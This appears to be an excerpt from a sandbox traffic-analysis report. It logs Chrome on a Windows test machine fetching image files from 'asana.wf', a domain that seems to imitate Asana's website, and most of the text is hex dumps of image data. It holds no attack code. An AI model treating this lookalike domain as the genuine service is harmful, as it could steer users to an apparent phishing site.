                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 25 41 16 ae 2c 45 a2 26 eb c5 c7 05 05 ec e0 3e b4 3c 71 f5 2b 1b 5c 81 9e 12 98 08 a3 11 3b 89 33 6c ae 2c cd 42 63 4f 81 66 bd 51 57 94 03 8a e5 a7 85 ee 17 b5 0c d0 c9 9f e4 a0 c0 bd 4f 72 17 ba 13 33 f4 45 b9 0e 6b f1 72 20 43 7b 08 ad 96 5f 90 94 2a 15 3c 97 a0 24 21 13 46 62 17 30 70 2d 55 89 20 fa 66 10 39 62 b7 f0 70 80 e1 b1 2b 4d 66 b1 59 9e 64 37 ac 4a b7 89 13 0d 1b 6b 59 98 c2 83 5a 15 a2 6a 9e 33 7f 83 0b ba ea 1a 2a b1 44 eb c3 11 cb 11 2f 98 05 f6 3c c1 56 34 01 e7 6d d9 27 5d e0 5e 89 4e 12 a3 02 40 9e c0 64 19 76 57 17 9d 6a be 2e 70 60 f2 3b e1 98 4a 00 cd f5 6f a4 25 9e a7 35 09 17 55 1e c5 e2 2e b4 ec 60 8a a6 31 d5 85 d0 49 2a 19 13 a7 b5 01 de 57 cb 26 ff fd b2 97 da 72 2b 50 a1 00 7d f1 4f 14 70 de 3a 28 a0 ab 8a 11 3c 06 49 5e 01
                                                                                                                                                                                                                    Data Ascii: %A,E&><q+\;3l,BcOfQWOr3Ekr C{_*<$!Fb0p-U f9bp+MfYd7JkYZj3*D/<V4m']^N@dvWj.p`;Jo%5U.`1I*W&r+P}Op:(<I^
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: af f9 9f 7f fb df be 18 e7 d1 56 71 94 1e 13 1c 61 3b 9f ea 4d 7f f7 e7 ff d1 17 bd b1 73 86 57 7c e9 df fa 4f af 44 ec 60 33 72 a7 54 a2 13 66 ac 3b cf 43 6d 3f 93 25 31 fb a8 56 18 e0 dc d2 1a 2c 43 1b 10 f7 9f f1 23 7e d1 87 3e 6f 76 87 57 7d c5 df fe 77 2f 0f d9 3a ea 20 00 a8 0c 48 ab a1 48 22 a2 20 5e fb e7 3f f2 e7 fd a8 b7 7b 52 d3 0c 2f ff 2f 7f f3 3f bf e6 26 76 2d 30 12 a8 8f f0 04 02 11 31 10 c6 8e 23 9f 70 e0 f5 ff f2 d9 1f fc c3 3f f4 dd df 7e 56 7b e6 e0 47 9f fa c0 d7 7c e5 7f 7a 29 63 49 62 54 02 73 cb 60 e2 30 ca 81 e7 ff 9e 9f f0 5b fe c1 ff f8 67 7f e7 cf fd e9 e5 ba ff da ef fb ce af fe d2 2f 0b 7f 6f 87 96 18 23 68 31 46 a0 3e 7f 7e 32 ec 40 f3 5f 0d 48 db 00 67 7c bb eb 73 3f ec 87 7f f0 bb fd 80 a7 cf 6a c8 79 dd 8b bf eb ab bf fc
                                                                                                                                                                                                                    Data Ascii: Vqa;MsW|OD`3rTf;Cm?%1V,C#~>ovW}w/: HH" ^?{R//?&v-01#p?~V{G|z)cIbTs`0[g/o#h1F>~2@_Hg|s?jy
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: bb 96 a7 f3 fa 96 51 84 8d 25 52 30 44 a4 fa 39 b3 90 b3 7f 2d 2e dd aa bb d6 ad 57 dd 5e 1e 9d 73 3c 4f 00 75 f2 40 d1 0b 5b 10 37 ca 22 46 06 b3 fb e8 76 4d e4 47 e0 81 a2 09 92 6c 51 40 55 ae 74 fb f0 e2 bf 73 20 ce 76 78 79 9e a3 3b 1e f3 9b 11 cb 39 f3 7d 7a 0a 4f e6 99 91 68 b6 9a 15 5e 91 30 58 a5 cf 51 90 d3 f1 e2 dd f3 dc bf 74 ac f7 5d 3e 6d c4 1b 1e 0a 22 51 81 42 98 82 64 76 13 47 0f 6c c0 34 b2 da 84 66 bb c4 00 e1 08 98 19 ab 30 18 f3 7d dc 8c ba 0f cb f3 e2 57 5d f0 9d ef 90 17 f2 ec a8 19 56 bd 7a 81 19 10 74 ba 27 8d 3b 38 51 b8 25 80 72 19 57 dd 1f eb a1 90 a3 c8 c2 59 01 43 10 a6 0b 1b e2 46 d7 b6 3c 72 a0 b0 01 51 6a 08 d4 14 09 45 93 64 0c 00 3b 57 09 62 a6 0a 66 03 eb 5a ce 61 12 e8 c6 8a 97 67 29 23 21 8b 65 6b 9e 67 f1 11 79 16 da
                                                                                                                                                                                                                    Data Ascii: Q%R0D9-.W^s<Ou@[7"FvMGlQ@Uts vxy;9}zOh^0XQt]>m"QBdvGl4f0}W]Vzt';8Q%rWYCF<rQjEd;WbfZag)#!ekgy
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: d5 4e a3 8b b8 5c c4 40 bc 00 36 13 08 1b eb 9b fe 2c 60 a4 c1 22 88 82 99 1f e0 9a 98 c3 63 a7 fa 07 36 f2 18 04 74 94 ba 25 4e c3 06 39 ae 47 c3 07 06 40 25 c1 40 c3 96 2a 47 d5 3f 74 9d f0 e7 c3 ec 57 28 66 b5 06 57 1e 7f 6c 45 cd ea 61 3b 84 5f 13 3a 4c ff 0c 04 c8 e3 dd bc cb 7e a4 49 2d 97 c2 f7 58 a0 a6 15 36 4d af 0f e5 13 df e6 bf 43 2e 0d 26 1c d6 cf 7e 34 72 01 18 4e 36 2a 24 d1 63 0e 4a 93 e5 04 00 eb d1 4d 42 c0 7e 9a 6c 73 f5 0c c7 cf 34 bf dd a2 30 3b 18 4a d4 12 08 3f 08 60 58 02 88 02 d9 90 a6 72 ac 0d 8e e8 97 81 00 9d 35 2f 83 b6 59 cc 66 aa 76 2e 40 91 8a e2 a0 2d 59 7d e6 8d b0 e5 08 eb d1 39 ca 71 35 30 af 50 9b d2 ea ca 9e 99 f9 6b 5b 7d 43 db d6 aa 73 27 f3 e9 cf db 2c 94 29 24 52 00 4e 34 f4 55 41 d2 27 38 6f 2b f6 87 45 b0 42 88
                                                                                                                                                                                                                    Data Ascii: N\@6,`"c6t%N9G@%@*G?tW(fWlEa;_:L~I-X6MC.&~4rN6*$cJMB~ls40;J?`Xr5/Yfv.@-Y}9q50Pk[}Cs',)$RN4UA'8o+EB
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: ae a7 64 96 b7 ad da d7 41 f3 f0 a2 08 31 1a 4e 12 e8 a8 2e b9 51 24 2e 44 82 61 98 0e 5c 1b 78 76 a8 4b b0 69 f1 3a ab 03 08 46 e2 58 91 98 66 35 81 2a 14 24 6e b3 ad ca 92 d5 3b 10 28 68 88 16 a4 0b 75 48 41 69 b3 7c 07 9a 78 61 9b 9c 92 bd bb ca 38 e1 2e dd 65 ed a4 e0 d4 ab 9d cc b5 c0 8a 2e b4 28 f5 95 37 12 41 d6 91 03 cb d0 7e 43 06 80 71 fd 24 62 c1 7e 34 07 46 f1 e4 b6 a3 02 b6 64 69 5d 13 f2 c8 7d 92 60 e6 d5 0e 9c 5a 88 15 87 be 42 d1 e9 05 56 2a ad e5 8c 5a 7c 08 84 73 80 ab 20 77 d6 65 52 e1 89 62 d9 95 26 72 10 8c 07 3b 4c fe 50 79 23 8d 70 14 f1 cf be 2e 10 97 13 0c c0 09 03 a6 f9 d3 58 df ae 04 45 d5 67 44 98 fa 8a 84 e3 52 57 60 98 ce ad ea bf cb 06 44 93 14 bf ec ab 80 2d ea c6 ed 96 46 d6 5c 90 8e 11 03 60 71 4e a9 18 f5 f4 94 f3 d1 a8
                                                                                                                                                                                                                    Data Ascii: dA1N.Q$.Da\xvKi:FXf5*$n;(huHAi|xa8.e.(7A~Cq$b~4Fdi]}`ZBV*Z|s weRb&r;LPy#p.XEgDRW`D-F\`qN
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 43 99 a3 f8 5e d1 1a 8d f6 39 f9 a6 01 f7 ce 18 5c d0 bf aa 25 6c 03 1a 21 0f 8a 11 46 17 bc 62 25 50 c3 44 37 5d 01 31 96 d1 e2 c9 31 ed 42 cf 6a 52 6c fb c8 f4 28 17 f6 58 ff b0 f8 a4 ba 1d 50 78 53 00 e6 5f 15 67 09 1a 3a fc f4 0c db d0 7d f5 cd 0b 00 25 7b a3 af bc 93 e6 b2 bd 78 9b 9e 1d 30 42 c7 a4 ab 02 59 99 d2 e9 69 61 62 5b f5 0f db 42 24 00 4e e3 98 7a 1f 4c ca 4e 58 0e 57 b8 0b 1d 1f 76 a0 2f 67 7e c3 5e 08 4d 36 ec ac 73 00 30 04 46 ef 8a 32 e9 29 6d a0 24 d1 b7 86 a0 97 cd f7 d8 07 64 e4 d6 47 39 2d a6 5d f6 d4 fa 03 5b 88 0e 0e 65 1c dc 8a d4 4e b4 a2 02 03 87 92 37 94 b6 b1 5e 5c 92 fc 66 24 0e 7b 52 70 e6 35 cf 14 43 cb 10 22 55 40 70 74 68 aa aa 54 2b 39 5a a7 a6 bf 53 24 2f 4d c0 6e f6 7f 78 60 66 78 4d 15 af 99 65 68 66 9a e7 1a 14 25
                                                                                                                                                                                                                    Data Ascii: C^9\%l!Fb%PD7]11BjRl(XPxS_g:}%{x0BYiab[B$NzLNXWv/g~^M6s0F2)m$dG9-][eN7^\f${Rp5C"U@pthT+9ZS$/Mnx`fxMehf%
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 3d 86 df 7e 21 30 3b 77 90 b0 c1 9e 1e 0e a0 12 ee 74 35 42 9e 0f 79 94 67 31 e4 31 a4 c6 55 99 82 c3 5d b4 cf db d7 21 8e a8 ef a2 2d ad fc 2a a6 4a a8 cc 22 4f 30 cb a2 00 54 bb 21 15 ef 79 8a 74 a1 cf 3c cf 0a 16 14 79 02 67 dc d6 44 f1 07 19 c6 74 a7 46 de 93 25 2c a7 22 f0 d3 0d 36 ad 1e 0a 55 0c 97 d7 60 e2 15 ff 59 fe 47 e4 59 f8 8e 79 16 bf 5f 1e 2a 29 07 37 08 94 4b fe 8d ce dd 45 d8 f1 66 5c 09 1f 57 e7 2e 7e cd 87 e2 8d 79 0a 95 c9 30 9c c7 5e a6 83 b8 7c 0b 23 26 bc 08 20 1b 53 d8 5b 01 84 91 87 01 57 15 ac be 81 6e 8b 6c 71 03 92 59 40 b1 de 12 73 71 98 75 99 b9 02 3a 53 65 e1 91 3c 22 2b f2 84 c8 ab cc a3 e1 46 79 aa 9b a5 14 cc f2 d8 04 1b a3 29 ea 3c d1 a8 53 f4 a3 5e 1e 53 dd cc 63 db 5c 18 27 cb 8e 5e 9e 02 17 7f 25 ea 1a 19 a6 63 6d 4f
                                                                                                                                                                                                                    Data Ascii: =~!0;wt5Byg11U]!-*J"O0T!yt<ygDtF%,"6U`YGYy_*)7KEf\W.~y0^|#& S[WnlqY@squ:Se<"+Fy)<S^Sc\'^%cmO


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    14192.168.2.164971494.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC597OUTGET /img/logo-ratio-40pxheight-merck.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "7dc-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 2012
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC2012INData Raw: 52 49 46 46 d4 07 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2b 01 00 4f 00 00 41 4c 50 48 b8 06 00 00 01 a0 87 ff 9f d9 39 fa ac eb 4d ed 36 d5 19 b5 31 67 db ae 7d 56 dd 9c 6d db 66 ed 66 cf 36 b7 4a ad 45 6a 77 bf 7f fc be 33 99 99 a4 f7 e4 f4 3c 11 31 01 f8 9f e8 36 a7 0c bd e5 8e 71 e7 88 82 f4 a3 cb 6d 8b 48 ba 6d de 45 05 a9 46 77 9f 22 06 23 b2 53 8b 2a 37 6f a7 e8 c5 ad 53 8a 7a 1f 91 d6 0d 03 52 89 66 8b 48 f7 d5 29 44 ad 62 d2 7f 51 fa f0 3c 19 0c db a6 0d 03 c8 e8 47 79 e9 82 13 98 a1 ab d2 85 a1 64 78 4d 95 54 61 91 29 3a 31 4d 10 64 7c 52 9a 30 c1 5c 58 29 45 f0 cd d1 e1 29 c2 2f 16 9c 93 22 ec b6 60 78 4a 90 d5 aa d7 d1 be 85 a3 44 cf 4a c6 1c a1 e8 46 e9 20 e4 5d 01 38 42 67 5b 00 1d 45 c4 1e 79 ba f2 db 0f 7d 66 a6 ef fb 33 6e
                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8X+OALPH9M61g}Vmff6JEjw3<16qmHmEFw"#S*7oSzRfH)DbQ<GydxMTa):1Md|R0\X)E)/"`xJDJF ]8Bg[Ey}f3n


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    15192.168.2.164971794.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC597OUTGET /img/home24-marketing-team-en-ui.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "67ee-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 26606
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC7966INData Raw: 52 49 46 46 e6 67 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 b9 05 00 13 04 00 41 4c 50 48 e6 02 00 00 01 1c b5 6d db 30 f2 ff 67 3b 7d ce 10 11 13 40 ac a3 b8 9e 71 36 27 70 10 49 52 24 b5 84 91 30 52 90 82 83 c3 c1 e1 00 1c b0 0e 38 07 2b 01 09 23 61 24 ec ff 08 e8 88 8b 88 09 30 90 b6 8d 7f fb db fe 44 44 e2 61 48 dd 7c a1 e4 3e 7a 0e 78 5f be be 90 73 6b fa 8e 94 85 a2 37 7d e1 e3 0b 49 b7 f8 a8 2c 44 bd dc 93 79 a1 ea 43 ee 8c 85 ac cf 37 ca 42 d7 cb 45 5c 08 7b 3a 51 63 6c 2e 87 b6 50 f6 02 40 17 d2 2e 40 63 6d 19 30 d6 e6 08 0b 6d 0f 99 b7 a5 ce db 7e 83 b7 99 f3 36 5f fe fe e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc
                                                                                                                                                                                                                    Data Ascii: RIFFgWEBPVP8XALPHm0g;}@q6'pIR$0R8+#a$0DDaH|>zx_sk7}I,DyC7BE\{:Qcl.P@.@cm0m~6_?????
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: 3f c9 c4 8b a4 20 e1 0e d5 51 87 28 33 e1 be 25 94 e8 dd 6a 72 0f ba 26 06 a4 b9 0f fa 6c 10 e5 01 92 94 96 01 84 49 f4 b2 65 5f 17 f6 66 2a a0 1b e6 a9 97 3b c4 ba 5a 75 30 1c 6e ec 52 24 9a cd 11 ce 07 29 fe f2 30 16 71 6f 93 b4 b9 31 a5 43 25 47 14 fa b3 57 bc 55 a4 c3 76 ab ae a8 67 17 fa 4a 29 6f 39 fb 54 54 06 48 c0 00 8f 4c dc 48 8e 6a 10 a8 73 67 c6 5b 04 e6 b9 ca aa fa c7 f9 b5 31 dc a8 73 eb f6 5f 07 9c e7 b0 69 c1 e0 18 c4 bf f0 f0 5b cb 82 c5 0d 3f 78 8a a9 aa 5b 3c 91 5b 27 13 7e 06 53 9d 08 6e 78 eb ee 28 ce 83 b8 44 1a 19 97 aa c3 95 66 76 0e ca 54 17 b4 3c 6e 4a f0 6d 0f 83 00 ec 44 f7 cb 33 6e 54 62 ef e3 03 43 99 65 9e 4a 31 56 a0 fb 1d f7 75 dc 9d f1 b6 74 5a 9b e2 7b 5b f8 e2 7a 1f a7 95 c9 02 34 81 6e 8a 50 7c 85 2a 33 27 ca 3d c9 34
                                                                                                                                                                                                                    Data Ascii: ? Q(3%jr&lIe_f*;Zu0nR$)0qo1C%GWUvgJ)o9TTHLHjsg[1s_i[?x[<['~Snx(DfvT<nJmD3nTbCeJ1VutZ{[z4nP|*3'=4
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: c2 a2 05 7c 8f 87 6a 8b e2 a4 d0 d6 d6 0e 10 e4 da 8c b8 15 97 3a 30 d8 17 29 1a b0 48 a2 94 93 96 81 16 46 27 62 88 85 30 03 cf d1 1d d7 03 d8 0b 0e fc 62 b4 0c 07 c0 09 2e 99 26 09 8a ef 34 ef ce af c7 ba 84 00 d1 9a 7b 70 8f 37 7d 6d 8d 83 0c c2 41 01 cf f1 51 8b 55 84 e3 22 bd 46 a6 8b 06 45 a4 ed c2 87 a2 10 24 07 68 ec 38 a3 6c 49 2d b1 db e8 06 40 a0 a6 be 3e 91 3b 0f 42 50 28 3c 5f 46 3e a9 78 1e ed d0 60 16 b0 32 82 eb d0 c3 b1 bf 94 83 17 ea c2 31 a0 00 1f a6 7a 39 cb d8 2e 33 fc 55 3d 3f 77 75 4c 15 cd 8b 24 51 c1 17 3d 7a 9f 00 8c 37 11 74 2c 74 50 66 95 7c 9b 21 d8 ee c0 fb 5b 1b 0f a4 93 70 9d 41 94 05 6e 49 17 98 fa 5c 2d 5d 6e aa 0f b1 e5 f8 23 c6 eb 82 94 49 99 0a c8 6c 50 e1 22 79 ee 41 6e 43 c0 b6 22 85 79 bd b4 e9 15 97 86 08 e9 55 36
                                                                                                                                                                                                                    Data Ascii: |j:0)HF'b0b.&4{p7}mAQU"FE$h8lI-@>;BP(<_F>x`21z9.3U=?wuL$Q=z7t,tPf|![pAnI\-]n#IlP"yAnC"yU6
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC2640INData Raw: 35 12 77 c6 12 c8 b3 04 90 70 32 5e 87 88 fe fb 54 19 f4 0f 92 fc 64 b6 4e 7b 9a d5 85 9f fe 4f 17 c5 35 f3 10 ac 9d 66 f8 33 cc 96 d6 c2 02 b6 6f 2c 00 05 05 70 1c 7c 66 85 d5 db 47 c8 63 17 c5 30 6f 33 f3 cb 8e 5d 71 6d d8 75 da 67 15 b1 88 18 12 df 5b 72 d6 8f 06 26 eb 4e f0 2b 53 66 91 0c 66 13 92 5b f0 6c fd 30 0d 95 c2 7d cd e3 4a 39 49 c7 5f 45 2b b5 97 63 3d 4a 48 e4 7c bc 9a bf 99 a2 39 8c 6a 01 42 8e 31 7c 07 c2 6c 93 78 18 e8 18 6e fe e6 7e 2a cd 0a b7 ce 7b c1 9a 29 11 97 e7 f2 1b b2 da 1a 82 62 52 0f 36 94 89 1d d1 1d d1 cb 33 cc bf 75 bf 7f 64 78 4a fc 21 53 dc 3b 32 8b 05 be 52 92 4e ad b1 d6 47 3f 2d 4d b5 7e 59 70 86 21 ba 4a a7 b0 ca b5 72 60 19 39 1c 48 52 08 14 fe 58 15 50 35 60 6c ca 24 ef 4f 45 4b 95 c3 11 45 11 3d 90 91 87 8e fe 08
                                                                                                                                                                                                                    Data Ascii: 5wp2^TdN{O5f3o,p|fGc0o3]qmug[r&N+Sff[l0}J9I_E+c=JH|9jB1|lxn~*{)bR63udxJ!S;2RNG?-M~Yp!Jr`9HRXP5`l$OEKE=


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    16192.168.2.164971694.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC585OUTGET /img/home24-goals-ui.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "5a96-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 23190
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 8e 5a 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 b9 05 00 61 03 00 41 4c 50 48 b8 02 00 00 01 1c 22 01 12 f8 3f 5b 93 d9 10 11 49 3b 22 be 14 6b 08 d9 b6 e5 a9 de 08 5f 04 a2 90 44 4d e0 6c 20 09 46 03 67 02 69 a0 09 dc 1a b0 06 d0 e0 fb 3c 7f 40 80 f7 ba 4e 44 4c 80 43 6a db f6 e4 41 f8 10 86 32 94 21 0c 21 83 0f 21 84 0c 42 08 a1 0c 9a c1 18 fa 79 ce b9 22 22 d0 e9 a7 b4 57 a3 e4 75 4b c1 63 bc 5c ab 91 f3 7d 71 63 24 1a 45 5f dc 80 a9 1a 49 cf c7 ae 68 44 7d 6e 93 97 51 f5 55 5a 36 23 eb cf 86 68 74 7d fe e3 64 7c 5d 2f bf b8 9d b0 59 91 1f 77 a3 ec 33 00 67 9c 5d 05 b8 93 36 0b c0 ce da 0a bc b1 76 f5 81 b7 5d 12 6d b3 b4 f1 b6 5c 79 5b 31 de ae ff fe e3 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9
                                                                                                                                                                                                                    Data Ascii: RIFFZWEBPVP8XaALPH"?[I;"k_DMl Fgi<@NDLCjA2!!!By""WuKc\}qc$E_IhD}nQUZ6#ht}d|]/Yw3g]6v]m\y[1???
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: 81 16 be e4 5c ac cc e8 2b 8b 83 20 20 65 c7 9c b2 51 e2 b4 3c e3 ea 0b 27 e1 e4 43 49 a7 4b c4 d0 f1 dc be c9 6a 09 9a 2a 7d 72 aa 36 8d 7d e1 60 11 7d 4f d6 12 6c c5 f6 f7 50 9b 5f 61 30 60 51 b6 4e 16 03 34 9d 64 99 3c 17 1a df 17 80 d9 3b 92 c3 e7 e4 24 e9 20 86 58 d9 fb 9d 64 74 60 94 e3 e7 df bd fb f0 1d f0 bb b8 f5 5f 2f 13 a0 af fe 4c ee 75 e8 9e 76 54 0c 90 12 19 b3 f8 e2 07 ec 17 0d 1e 05 32 b8 74 b1 22 1c 4c 52 1f 49 9e 2e 4f 29 8b dd f5 5d 8b fb d4 d9 ce da 9b a4 47 e6 a6 cb 74 f2 42 ba 9a 5b cf 69 ca 5a d1 e9 22 ed 18 8b 9f 40 4a 99 dd 34 06 6a ab 65 ac 4f 90 5b 65 7e 58 48 21 b8 ce fb 69 5b fb cc 0c da 49 2c 01 cb 54 7a 9d 9c d5 98 b4 63 78 c6 bc 52 f7 26 8d 82 c4 af c6 2d d4 d2 40 bc 41 3e 49 28 56 7b 6b 3d f0 17 e7 0f b1 37 42 92 a1 3a 5d
                                                                                                                                                                                                                    Data Ascii: \+ eQ<'CIKj*}r6}`}OlP_a0`QN4d<;$ Xdt`_/LuvT2t"LRI.O)]GtB[iZ"@J4jeO[e~XH!i[I,TzcxR&-@A>I(V{k=7B:]
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7224INData Raw: 73 1e 00 ca 49 f7 5a f0 26 16 3e ea 78 4c 82 6b 31 ff d5 f2 bf ec 73 dc d0 d6 d9 0c ad 76 8d fb a8 f1 5b ac 80 1a a1 6f 9b 69 c0 b7 c5 1a 8c b1 0a 3f 0f 20 fd 15 cc ff a8 9a 68 b0 75 84 09 26 dc 0d 80 a1 58 04 95 37 4d c1 7c d9 ba ab 90 c9 67 34 e8 de 08 29 e4 f5 49 51 9b 12 8f cd 80 5b eb 2b 61 f2 f5 78 b2 8e b8 41 6f 08 e6 32 f3 7e 99 63 28 7c 09 7b 31 71 9d 82 dd d3 6b 8e a2 31 a9 76 b2 96 ec 70 58 60 98 87 25 e0 d4 a0 2f b1 c5 23 9f 61 c4 d2 bb 13 ea e0 a3 b0 66 65 9e bd 00 ef 92 4c ea 87 03 33 5c b2 a8 98 35 05 e9 1d da 99 3e 50 4b ce cd 55 6f df 2d 45 b2 a7 27 7a d8 cc 98 78 62 7d 5d 1c 0d a9 f3 fd e8 61 39 8c 7b b1 b2 cb d2 eb 97 e6 bb a0 00 0f ae 08 d8 bc f2 3e 31 c8 c5 29 97 15 97 5a 05 bb 34 63 39 23 ba 7d 78 86 6f b9 63 13 cf a6 ef 26 4e 0c 4b
                                                                                                                                                                                                                    Data Ascii: sIZ&>xLk1sv[oi? hu&X7M|g4)IQ[+axAo2~c(|{1qk1vpX`%/#afeL3\5>PKUo-E'zxb}]a9{>1)Z4c9#}xoc&NK


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    17192.168.2.164971894.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC366OUTGET /img/logo-ratio-40pxheight-Dell.svg HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
